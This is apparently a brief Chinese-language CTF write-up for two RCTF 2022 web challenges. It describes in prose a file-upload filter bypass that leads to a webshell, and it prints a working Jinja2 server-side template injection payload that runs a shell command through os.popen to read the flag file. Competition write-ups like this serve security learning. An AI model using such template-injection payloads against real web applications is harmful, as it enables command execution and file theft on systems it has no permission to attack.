RCTF | 风尘孤狼

.use-motion .brand,.use-motion .menu-item,.sidebar-inner,.use-motion .post-block,.use-motion .pagination,.use-motion .comments,.use-motion .post-header,.use-motion .post-body,.use-motion .collection-header{opacity:initial;}.use-motion .site-title,.use-motion .site-subtitle{opacity:initial;top:initial;}.use-motion .logo-line-before i{left:initial;}.use-motion .logo-line-after i{right:initial;}

0%

RCTF

发表于 2022-12-14 分类于赛后复盘， CTF 阅读次数：阅读次数： Valine：
本文字数： 369 阅读时长 ≈ 1 分钟

前言

48h的比赛，题目质量很好，只看了web，写了两道题目，记录一下吧，其他题目也看大佬的wp了，先学习一下，就不复现了，期末考试没时间

easy_upload

文件上传类型题目

文件名通过大小写绕过，文件内容先使用base64反复加密编码数据进行欺骗绕过过滤

成功webshell之后命令执行得到flag

RCTF{ar3_u_s1ng1e_d0g?}

filechecker_mini

ssti

*\#! /{{config.__class__.__init__.__globals__['os'].popen('cat /f*').read()}}*

得到flag

RCTF{Just_A_5mall_Tr1ck_mini1i1i1__Fl4g_Y0u_gOtt777!!!}

制作不易，如若感觉写的不错，欢迎打赏

本文作者： 故里
本文链接： https://hzy2003628.top/2022/12/14/RCTF/
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！